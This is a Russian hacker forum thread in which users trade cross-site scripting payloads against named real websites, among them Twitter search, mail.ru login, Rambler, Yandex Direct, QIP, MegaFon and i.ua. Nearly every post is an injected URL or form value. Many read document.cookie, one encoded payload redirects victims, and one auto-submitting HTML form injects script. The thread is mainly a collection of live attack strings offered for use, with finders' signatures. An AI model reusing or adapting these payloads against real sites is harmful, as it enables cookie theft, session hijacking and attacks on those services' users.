Twitter - не почтовик, но надеюсь меня не побьют:

http://search.twitter.com/search?q=%26%2339%3B)%3Balert(%26%2339%3Bxek%26%23 39%3B)%3B%2F%2F

И клацаем справа на "Twet the results".

Ну тогда я тоже выложу так как не нашол подходящей темы!
Магазин по продаже софта!

http://soft.qwerty.ru/search/index.php?q=%22%3E%3Cscript%3Ealert%28%27BY+HACKED +Mil-Net%27%29%3C%2Fscript%3E&s=%CD%E0%E9%F2%E8

Почта? Почта!
http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

https://mailserver1.hushmail.com/hushmail/index.php?PHPSESSID=A903042B9212494D8B8F3A7EFA99F9 60

Email Address:
вводим скрипт '><script>alert(/Ruslan1817/)</script>

http://autorambler.ru/journal/testdrives/?brand=%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

http://autorambler.ru/cars/by-brand/?brand=62&model=40&no=1&period=day%22%3E%3Cscript%3Ealert(/vitaliy_n73/)%3C/script%3E

Пассивная xss на mail.ru
https://auth.mail.ru/cgi-bin/auth?page=&post=&login_from=&Login="><SCRIPT>alert("XSS")<%2FSCRIPT>">&Domain=mail.ru&Password=yyy

Пассивная xss на mail.ru
https://auht.mail.ru/cgi-bin/auth?page=&post=&login_from=&Lоgin=">< SCRIPT>alert("XSS")<%2FSCRIPT>">&Domain=mail.ru&Password=yyy

Повтор!

http://forum.antichat.ru/showpost.php?p=1645042&postcount=86

Не почта, но тоже оч забавный ресурс ))

http://naked.com/index.php?s=user.credits.buyCredit&freeRegister=1&freeRegister='%3E%3C''%3E%22%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E

http://11x11.mail.ru/tournaments/414252/act=join&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cooki e)%3C/script%3E

работает тока у авторизированных ... а эт минус.

Работает у авторизированных .

http://11x11.mail.ru/users/10000125/'%3E%3C''%3E%22%3E%3Cscript%3Ealert(document.cooki e)%3C/script%3E

http://afisha.rambler.ru/message.html?id=33028434&pg=%22%3E%3Cscript%3Ealert%28%27mikail%27%29%3C/script%3E

http://file.qip.ru/preview.jsp?w=200%27&h=200%27&s=no&b=yes&l=javascript:alert(document.cookie);

_http://direct.yandex.ru/registered/main.KJdxxnJWRSRj8t_8.pl?&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Ecmd=newCamp&mediaType=text&notnew=yes

http://maps.icq.com/maps/?country=RU&street=&city=%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert%28d ocument.cookie%29%3C/script%3E

http://finance.rambler.ru/calculators/hypothec/?sum=56&years=6546&interest="><script>alert(/XSS/)</script>

http://do.ngs.ru/categories/services/poligr/sell/?&'><''>"><script>alert('Печенько хочет к маме')</script>

http://rabota.ngs.ru/resumes/search/?pageType=all&'><''>"><script>alert('Печенько хочет к маме')</script>

http://mail.am

http://m.mail.am/mail/util.php?func=info&sort_subject='"><script>alert();</script>


http://mirtesen.ru
http://mirtesen.ru/people/map?city=&igp=#search&<img src=s onerror=alert(document.cookie)>&&

http://www.everyday.com

http://www.register.everyday.com/reg_step.phtml?REG_TEXT_FIRST_NAME="><script>alert('0_o')</script>

http://list.ngs.ru/page.php?do='search&bool=and&substring=0&mh=10&query="><script>alert(document.cookie)</script>

http://en.securitylab.ru/nvd/index.php?'arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%'>"><script>alert(document.cookie)</script>

Может кому будет интересно
http://moscow.megafon.ru/buy/pay/pay/?city=985368&'metro=537480'>"><script>alert(document.cookie)</script>
http://search.twitter.com/search?q=cool+filter%3Alinks'>"><script>alert(document.cookie)</script>

Может кому будет интересно
Очень даже интересно :)
Особенно в таком виде:
http://search.twitter.com/search?q=%66%69%6C%74%65%72%3A%6C%69%6E%6B%73%27%3 E%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65% 6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27http://google.com%27%3C%2F%73%63%72%69%70%74%3E

http://forum2.km.ru/keyboard.aspx?id=</script><script>alert(document.cookie)</script>

http://vkrugudruzei.ru/search/interest.asp?iname=%F2%E0%ED%F6%FB&igroup=&iequal=1>"><script>alert(document.cookie)</script>

liveinternet
<body onload="document.UsrSrchImportFormSrch.submit();">
<form id="UsrSrchImportFormSrch" action="http://www.liveinternet.ru/importmail.php?cmd=getbook_icq" method="post" name="UsrSrchImportFormSrch" onKeyDown="checkKey('UsrSrchImportFormSrch');">
<input class="SrvBorderBlue" type="text" name="addicqs" value='"><script>alert(/Found by life_glider/);</script> <br "' />
<input class="Hi" type="submit" value="Искать!" />
</form>
</body>

http://mbox.i.ua/list/INBOX/?fMask=0&fReq=0&sort=2"><script>alert("FOUND BY LIFE-GLIDER")</script><br%20tr="&p=0&_rand=1274703519

http://job.ukr.net/vacancy/?AdvancedSearch=0&ShowSearchResults=1&event=&sd=-2&Keywords="><img src=foo.png onerror=alert('kusto') />

http://maps.mail.ru

В строке поиска:
' onMouseOver='alert(1)'>
и "Найти"



kards.qip.ru
В любых комментариях в login/pass вставляем
"><img src='.' onerror='alert()'>
И нажимаем "Добавить комментарий"